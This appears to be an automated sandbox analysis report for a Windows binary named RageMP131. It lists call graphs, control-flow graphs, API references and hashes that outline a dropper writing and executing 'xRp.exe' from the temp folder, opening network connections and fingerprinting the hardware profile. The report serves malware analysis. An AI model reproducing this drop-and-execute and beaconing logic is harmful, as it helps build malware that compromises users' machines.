22527->22504 22528->22516 22530 6b16da std::locale::_Setgloballocale 22529->22530 22532 6b1719 22530->22532 22534 6b1832 22530->22534 22532->22525 22533->22525 22535 6b7400 RtlAllocateHeap 22534->22535 22537 6b1842 22535->22537 22538 6b7400 RtlAllocateHeap 22537->22538 22544 6b187a 22537->22544 22545 6b1848 22537->22545 22541 6b1871 22538->22541 22539 6b7400 RtlAllocateHeap 22540 6b1886 FindCloseChangeNotification 22539->22540 22540->22545 22542 6b7400 RtlAllocateHeap 22541->22542 22542->22544 22543 6b18a0 22543->22532 22544->22539 22544->22545 22546 6b736f RtlAllocateHeap __dosmaperr 22545->22546 22546->22543 22548 6a2080 22551 6a1fbe 22548->22551 22550 6a2092 22553 6a1fca std::locale::_Setgloballocale 22551->22553 22552 6a1fd1 22569 6a9f5f RtlAllocateHeap __dosmaperr 22552->22569 22553->22552 22555 6a1ff1 22553->22555 22557 6a2003 22555->22557 22558 6a1ff6 22555->22558 22556 6a1fd6 22570 6a14c0 RtlAllocateHeap ___std_exception_copy 22556->22570 22565 6b33a8 22557->22565 22571 6a9f5f RtlAllocateHeap __dosmaperr 22558->22571 22562 6a200c 22564 6a1fe1 22562->22564 22572 6a9f5f RtlAllocateHeap __dosmaperr 22562->22572 22564->22550 22566 6b33b4 std::_Lockit::_Lockit std::locale::_Setgloballocale 22565->22566 22573 6b344c 22566->22573 22568 6b33cf 22568->22562 22569->22556 22570->22564 22571->22564 22572->22564 22574 6b346f 22573->22574 22578 6b34b5 22574->22578 22579 6b3113 22574->22579 22576 6b34d0 22583 6b3ad3 RtlAllocateHeap __dosmaperr 22576->22583 22578->22568 22582 6b3120 __Getctype std::_Facet_Register 22579->22582 22580 6b314b RtlAllocateHeap 22581 6b315e __dosmaperr 22580->22581 22580->22582 22581->22576 22582->22580 22582->22581 22583->22578 22585 6279d0 22586 627a17 22585->22586 22589 6279e8 std::locale::_Setgloballocale 22585->22589 22590 62acb0 22586->22590 22588 627a2a 22591 62acd5 22590->22591 22592 62adfc 22590->22592 22595 62ad43 22591->22595 22596 62ad36 22591->22596 22598 62acea 22591->22598 22613 5c2040 RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 22592->22613 22594 62ae01 22614 5c1fa0 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy 22594->22614 22601 69bfb1 std::_Facet_Register 2 API calls 22595->22601 22603 62acfa std::locale::_Locimp::_Locimp std::locale::_Setgloballocale 22595->22603 22596->22594 22596->22598 22605 69bfb1 22598->22605 22601->22603 22604 62adba std::locale::_Locimp::_Locimp std::locale::_Setgloballocale 22603->22604 22615 6a14d0 RtlAllocateHeap ___std_exception_copy __Getctype 22603->22615 22604->22588 22608 69bfb6 std::_Facet_Register 22605->22608 22607 69bfd0 22607->22603 22608->22607 22610 5c1fa0 Concurrency::cancel_current_task 22608->22610 22616 6aac4c 22608->22616 22609 69bfdc 22609->22609 22610->22609 22622 69d371 RtlAllocateHeap RtlAllocateHeap __freea ___std_exception_copy 22610->22622 22612 5c1fe3 22612->22603 22613->22594 22614->22603 22621 6b3b4d __Getctype std::_Facet_Register 22616->22621 22617 6b3b8b 22623 6a9f5f RtlAllocateHeap __dosmaperr 22617->22623 22619 6b3b76 RtlAllocateHeap 22620 6b3b89 22619->22620 22619->22621 22620->22608 22621->22617 22621->22619 22622->22612 22623->22620 22624 b60000 22626 b60044 GetPEB 22624->22626 22628 b60077 GetTempPathA 22626->22628 22629 b6020b CreateFileA 22628->22629 22630 b60265 22629->22630 22631 b6022d 22629->22631 22632 b60246 WriteFile 22631->22632 22633 b60244 22631->22633 22634 b60255 FindCloseChangeNotification WinExec 22632->22634 22633->22634 22634->22630 22635 6a5e56 22636 6a5e69 ___std_exception_copy 22635->22636 22641 6a5bad 22636->22641 22638 6a5e7e 22648 6a11fc RtlAllocateHeap ___std_exception_copy 22638->22648 22640 6a5e8b 22643 6a5bb9 std::locale::_Setgloballocale 22641->22643 22642 6a5bbf 22658 6a1443 RtlAllocateHeap ___std_exception_copy __Getctype 22642->22658 22643->22642 22645 6a5c02 22643->22645 22649 6a5d30 22645->22649 22647 6a5bda 22647->22638 22648->22640 22650 6a5d43 22649->22650 22651 6a5d56 22649->22651 22650->22647 22659 6a5c57 22651->22659 22653 6a5d79 22654 6a5e07 22653->22654 22655 6a22f1 4 API calls 22653->22655 22654->22647 22657 6a5da7 22655->22657 22656 6aae9d 2 API calls 22656->22654 22657->22656 22658->22647 22660 6a5cc0 22659->22660 22661 6a5c68 22659->22661 22660->22653 22661->22660 22663 6aae5d SetFilePointerEx RtlAllocateHeap ___std_exception_copy 22661->22663 22663->22660 22686 5ca120 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 22664 5dd620 WSAStartup 22665 5dd716 22664->22665 22666 5dd658 22664->22666 22666->22665 22667 5dd6e4 socket 22666->22667 22667->22665 22668 5dd6fa connect 22667->22668 22668->22665 22669 5dd70c closesocket 22668->22669 22669->22665 22669->22667 22682 5d4560 GetPEB RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 22687 5ddb20 6 API calls

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 b60044-b60074 GetPEB 1 b60077-b6009a 0->1 2 b6009d-b600a0 1->2 3 b600a6-b600bc 2->3 4 b601ee-b6022b GetTempPathA CreateFileA 2->4 5 b60110-b60116 3->5 6 b600be-b600c5 3->6 11 b60265-b60269 4->11 12 b6022d-b60230 4->12 7 b60118-b6011f 5->7 8 b60129-b6012f 5->8 6->5 9 b600c7-b600ce 6->9 7->8 13 b60121-b60124 7->13 14 b60131-b60138 8->14 15 b60148-b6014e 8->15 9->5 16 b600d0-b600d7 9->16 17 b60232-b60238 12->17 18 b601bb-b601c0 13->18 14->15 19 b6013a-b60141 14->19 20 b60167-b6016f 15->20 21 b60150-b60157 15->21 16->5 22 b600d9-b600dd 16->22 23 b60246-b60252 WriteFile 17->23 24 b6023a-b60242 17->24 26 b601c2-b601c5 18->26 27 b601e0-b601e9 18->27 19->15 25 b60143-b60146 19->25 29 b60171-b60178 20->29 30 b60188-b6018e 20->30 21->20 28 b60159-b60160 21->28 22->5 31 b600df-b600e3 22->31 33 b60255-b60262 FindCloseChangeNotification WinExec 23->33 24->17 32 b60244 24->32 25->18 26->27 34 b601c7-b601ca 26->34 27->2 28->20 35 b60162-b60165 28->35 29->30 36 b6017a-b60181 29->36 38 b601a7-b601ad 30->38 39 b60190-b60197 30->39 31->18 37 b600e9-b6010b 31->37 32->33 33->11 34->27 42 b601cc-b601cf 34->42 35->18 36->30 43 b60183-b60186 36->43 37->1 38->18 41 b601af-b601b6 38->41 39->38 40 b60199-b601a0 39->40 40->38 44 b601a2-b601a5 40->44 41->18 45 b601b8 41->45 42->27 46 b601d1-b601d4 42->46 43->18 44->18 45->18 46->27 48 b601d6-b601d9 46->48 48->27 49 b601db-b601de 48->49 49->4 49->27
                                      APIs
                                      • GetTempPathA.KERNELBASE(00000104,?), ref: 00B601FA
                                      • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00B60223
                                      • WriteFile.KERNELBASE(00000000,FFFFCD8F,00003E00,?,00000000), ref: 00B60252
                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00B60256
                                      • WinExec.KERNEL32(?,00000005), ref: 00B60262
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$ChangeCloseCreateExecFindNotificationPathTempWrite
                                      • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul$xRp.exe
                                      • API String ID: 789397536-2378254480
                                      • Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                      • Instruction ID: c175cf7e62359e322fd0410336ddb39b1901080d65975b1861dbf803efc8450c
                                      • Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                      • Instruction Fuzzy Hash: 0D611874D21219DBCF24DF95C884AAEB7B0FF55715F2482AAE405BB201C3789E81CB91

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 155 5140442-5140448 156 51404c1-51405a0 155->156 157 514044a-5140452 155->157 171 51405a1-51405af GetCurrentHwProfileW 156->171 159 5140454-5140458 157->159 160 5140459-51404b3 157->160 159->160 160->156 172 51405c3-5140820 call 51407da 171->172
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 703434012eb6bfa5a272ed4fb687aa482da8724003e61ba0076f230a100643b8
                                      • Instruction ID: 40951863d5f2c0cf4325164e1425d89a46bd06a2bf56432de2090108abc6886a
                                      • Opcode Fuzzy Hash: 703434012eb6bfa5a272ed4fb687aa482da8724003e61ba0076f230a100643b8
                                      • Instruction Fuzzy Hash: E4617EFB60C161BDB225D1432B18EFB676EE7DA730732946BF507CA506D3980E4A5831

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 50 5dd620-5dd652 WSAStartup 51 5dd658-5dd682 call 5c7d20 * 2 50->51 52 5dd726-5dd72f 50->52 57 5dd68e-5dd6d4 51->57 58 5dd684-5dd688 51->58 60 5dd6d6-5dd6dc 57->60 61 5dd720-5dd725 57->61 58->52 58->57 62 5dd6de 60->62 63 5dd734-5dd73e 60->63 61->52 64 5dd6e4-5dd6f8 socket 62->64 63->61 68 5dd740-5dd748 63->68 64->61 67 5dd6fa-5dd70a connect 64->67 69 5dd70c-5dd714 closesocket 67->69 70 5dd730 67->70 69->64 71 5dd716-5dd71a 69->71 70->63 71->61
                                      APIs
                                      • WSAStartup.WS2_32 ref: 005DD64B
                                      • socket.WS2_32(?,?,?,?,?,?,006F50C8,?,?), ref: 005DD6EE
                                      • connect.WS2_32(00000000,?,?,?,?,?,006F50C8,?,?), ref: 005DD702
                                      • closesocket.WS2_32(00000000), ref: 005DD70D
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Startupclosesocketconnectsocket
                                      • String ID:
                                      • API String ID: 3098855095-0
                                      • Opcode ID: 010cad729a3e4d2f05aa18a12cac2b642f3433f6b1743e6fcb46c6aa31dc04ca
                                      • Instruction ID: 48fc1ac0593a76cbf399dd50e8d94f96bb10c0504a59270e5ddcc3d899b8c9c4
                                      • Opcode Fuzzy Hash: 010cad729a3e4d2f05aa18a12cac2b642f3433f6b1743e6fcb46c6aa31dc04ca
                                      • Instruction Fuzzy Hash: 7231C6715053555BD7209F68888476BBBE5FFC9364F001B5BF9A8922D0D730990586A2

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 72 51403f5-51405a0 87 51405a1-51405af GetCurrentHwProfileW 72->87 88 51405c3-5140820 call 51407da 87->88
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 5fb412544577c6bc4a84c99fbef3729bf3f7d4efd11706f97ab0c6aa64b5773f
                                      • Instruction ID: bd5cd3daca57e8ed38f81a1e41dd6185331786e1d58b5b8552a6af2e055fc212
                                      • Opcode Fuzzy Hash: 5fb412544577c6bc4a84c99fbef3729bf3f7d4efd11706f97ab0c6aa64b5773f
                                      • Instruction Fuzzy Hash: 9F616CFB60C121BDB126D1432F18EFB676EE6DA770732946BF907CA506D3980E495831

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 114 514041b-51405a0 128 51405a1-51405af GetCurrentHwProfileW 114->128 129 51405c3-5140820 call 51407da 128->129
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: d01c9f24e47011cddf5d22b240c42486fcf2f8aa6649ba57d9a644ef762e80a2
                                      • Instruction ID: e4a68daff059ba137cf2f77ea077a72a0eedf9a83dafb8a84cd2eb7c47ac24d1
                                      • Opcode Fuzzy Hash: d01c9f24e47011cddf5d22b240c42486fcf2f8aa6649ba57d9a644ef762e80a2
                                      • Instruction Fuzzy Hash: 32617DFB60C165BDB225D1832B18EFB676ED7DA730732942BF907CA506D3980E4A5831

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 198 51404bb-51404bc 199 514047c-51404b3 198->199 200 51404be-51404c0 198->200 202 51404c1-51405a0 199->202 200->202 212 51405a1-51405af GetCurrentHwProfileW 202->212 213 51405c3-5140820 call 51407da 212->213
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 500fda9586cfb474e5b683846d15200593ec00ea72b83d7d821e9946fa348c67
                                      • Instruction ID: 1b27137c6cb5f36b97d5e6411b193b59f6919d883dea525db715f6c0761dddf9
                                      • Opcode Fuzzy Hash: 500fda9586cfb474e5b683846d15200593ec00ea72b83d7d821e9946fa348c67
                                      • Instruction Fuzzy Hash: 48519FFB60C125BCB229D1432B18EFB676EE7DA730732946BF507C9506D3980E4A5831

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 239 514049a-51405a0 251 51405a1-51405af GetCurrentHwProfileW 239->251 252 51405c3-5140820 call 51407da 251->252
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: fbb5d8498aab2c865004b491f1beb0022447b91bcf4f4d7ed292007909038470
                                      • Instruction ID: dea2c47422ee13fc157bda7e330eac0fcf429c4f83387a1f1242c24a4a06e404
                                      • Opcode Fuzzy Hash: fbb5d8498aab2c865004b491f1beb0022447b91bcf4f4d7ed292007909038470
                                      • Instruction Fuzzy Hash: E5518FFB64C125BCB225D1432B18EFB676EE7DA7307329467F607C9506E3940E495831

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 278 51404cf-51404d7 279 5140504-5140509 278->279 280 51404d9-51404e5 278->280 282 51404ea-51404fa 279->282 283 514050b 279->283 281 51404fb-51404ff 280->281 284 514050d-51405a0 281->284 282->281 283->284 290 51405a1-51405af GetCurrentHwProfileW 284->290 291 51405c3-5140820 call 51407da 290->291
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 4ab7a6e080d062480b83ddd3d5007f0ac5c4e0914ee2ae8c552bbf938a7ef65d
                                      • Instruction ID: 760de9132b1dd84b903a643f1bef5046719ace8520916b18caf8c02f20797d95
                                      • Opcode Fuzzy Hash: 4ab7a6e080d062480b83ddd3d5007f0ac5c4e0914ee2ae8c552bbf938a7ef65d
                                      • Instruction Fuzzy Hash: 3F51D2FB60C161BDB226D1532B18AFB676EE7DA330732946BF503CE506D3880E4A5831

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 317 51404ab-51405a0 328 51405a1-51405af GetCurrentHwProfileW 317->328 329 51405c3-5140820 call 51407da 328->329
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 6135e421f8cf9f509261164a7a5123d5a51050f93e68064cc20222dbcf8feac9
                                      • Instruction ID: 1970b7ddea205c2d4b915f40b21f64c39e43a1d213a1783bdc15b4430f1ad5e2
                                      • Opcode Fuzzy Hash: 6135e421f8cf9f509261164a7a5123d5a51050f93e68064cc20222dbcf8feac9
                                      • Instruction Fuzzy Hash: 51518FFB64C125BCB226D1432B18EFB676EE7DA7307329467F507C9506E3980E4A5831

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 355 5140515-51405a0 360 51405a1-51405af GetCurrentHwProfileW 355->360 361 51405c3-5140820 call 51407da 360->361
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 8616927c14762f75eb0b1236d31ad0a39708621c1f058f259ac514deab9fe64c
                                      • Instruction ID: 9e78d8d75cd60d632e5fdfddf264f3e17c287f57f7cdc06a00794e05b28c343a
                                      • Opcode Fuzzy Hash: 8616927c14762f75eb0b1236d31ad0a39708621c1f058f259ac514deab9fe64c
                                      • Instruction Fuzzy Hash: 8851A1FB20C125BDB226D1432F28EFB676EE6DA730732946BF903C9506D3940E495831

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 387 5140533-51405a0 392 51405a1-51405af GetCurrentHwProfileW 387->392 393 51405c3-5140820 call 51407da 392->393
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 2a08f32da3b1c2227488cdfb7fdce5f864c11a70667c985f9f4e7f47050ee8c9
                                      • Instruction ID: 33c634d8dee0fc05f30315f91f2f2fba61c0b73ccd3500dca57bd8c9b8faa9f9
                                      • Opcode Fuzzy Hash: 2a08f32da3b1c2227488cdfb7fdce5f864c11a70667c985f9f4e7f47050ee8c9
                                      • Instruction Fuzzy Hash: CC4190FB60C125BCB226D1432F18EFB676EE6DA7307329467F907C9506D3980E495831

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 419 5140553-51405a0 421 51405a1-51405af GetCurrentHwProfileW 419->421 422 51405c3-5140820 call 51407da 421->422
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: b53f78ac8bbe8f024e22340e242d0f7b163131f15614c00f1bd100c6481f2457
                                      • Instruction ID: caf2eda25d2b50f96228756437cc647f4ad9785995465f15ae58f0461fa7ec22
                                      • Opcode Fuzzy Hash: b53f78ac8bbe8f024e22340e242d0f7b163131f15614c00f1bd100c6481f2457
                                      • Instruction Fuzzy Hash: 3941A0FB20C125BDB226D1532B28EFB676ED7DA730732946BF903CA506D3980E495831

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 448 5140546-51405a0 451 51405a1-51405af GetCurrentHwProfileW 448->451 452 51405c3-5140820 call 51407da 451->452
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 8f5738729ad9b6fadf8501cc6389212beb84036b3738fcb47cae875aefe6cab6
                                      • Instruction ID: 459ef1ce5613c760afec952415ef013734770693383dad28d8fc724ad2292ec4
                                      • Opcode Fuzzy Hash: 8f5738729ad9b6fadf8501cc6389212beb84036b3738fcb47cae875aefe6cab6
                                      • Instruction Fuzzy Hash: BE41A2FB60C121BCB125D1432F28EFB676EE6DA730732946BF903C9506D7980E495831

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 478 5140595-514059a 479 51405a1-51405af GetCurrentHwProfileW 478->479 480 514059c-51405a0 478->480 481 51405c3-5140820 call 51407da 479->481 480->479
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 19cb4454066c78aa650faffcdde0601382bd53b2c13ae8ee470d653a829d014a
                                      • Instruction ID: a0681c256099a1af6e1c5d92045e1a6b0e7bf4795ad3acc6e81f8912b41a0a64
                                      • Opcode Fuzzy Hash: 19cb4454066c78aa650faffcdde0601382bd53b2c13ae8ee470d653a829d014a
                                      • Instruction Fuzzy Hash: 6441C1FB60C221BDB226D1432B28EFB276EE7DA3307329467F503CA506D7980E495871

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 507 6b21bc-6b21de 508 6b23d1 507->508 509 6b21e4-6b21e6 507->509 512 6b23d3-6b23d7 508->512 510 6b21e8-6b2207 call 6a1443 509->510 511 6b2212-6b2235 509->511 518 6b220a-6b220d 510->518 514 6b223b-6b2241 511->514 515 6b2237-6b2239 511->515 514->510 517 6b2243-6b2254 514->517 515->514 515->517 519 6b2267-6b2277 call 6b1d01 517->519 520 6b2256-6b2264 call 6aae9d 517->520 518->512 525 6b2279-6b227f 519->525 526 6b22c0-6b22d2 519->526 520->519 527 6b22a8-6b22be call 6b18d2 525->527 528 6b2281-6b2284 525->528 529 6b2329-6b2349 WriteFile 526->529 530 6b22d4-6b22da 526->530 550 6b22a1-6b22a3 527->550 531 6b228f-6b229e call 6b1c99 528->531 532 6b2286-6b2289 528->532 534 6b234b-6b2351 529->534 535 6b2354 529->535 536 6b22dc-6b22df 530->536 537 6b2315-6b2327 call 6b1d7e 530->537 531->550 532->531 538 6b2369-6b236c 532->538 534->535 542 6b2357-6b2362 535->542 543 6b2301-6b2313 call 6b1f42 536->543 544 6b22e1-6b22e4 536->544 558 6b22fc-6b22ff 537->558 546 6b236f-6b2371 538->546 552 6b23cc-6b23cf 542->552 553 6b2364-6b2367 542->553 543->558 545 6b22ea-6b22f7 call 6b1e59 544->545 544->546 545->558 555 6b239f-6b23ab 546->555 556 6b2373-6b2378 546->556 550->542 552->512 553->538 561 6b23ad-6b23b3 555->561 562 6b23b5-6b23c7 555->562 559 6b237a-6b238c 556->559 560 6b2391-6b239a call 6a9f28 556->560 558->550 559->518 560->518 561->508 561->562 562->518
                                      APIs
                                      • WriteFile.KERNELBASE(?,00000000,006A5DA7,?,00000000,00000000,00000000,?,00000000,?,0069B2D2,006A5DA7,00000000,0069B2D2,?,?), ref: 006B2341
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
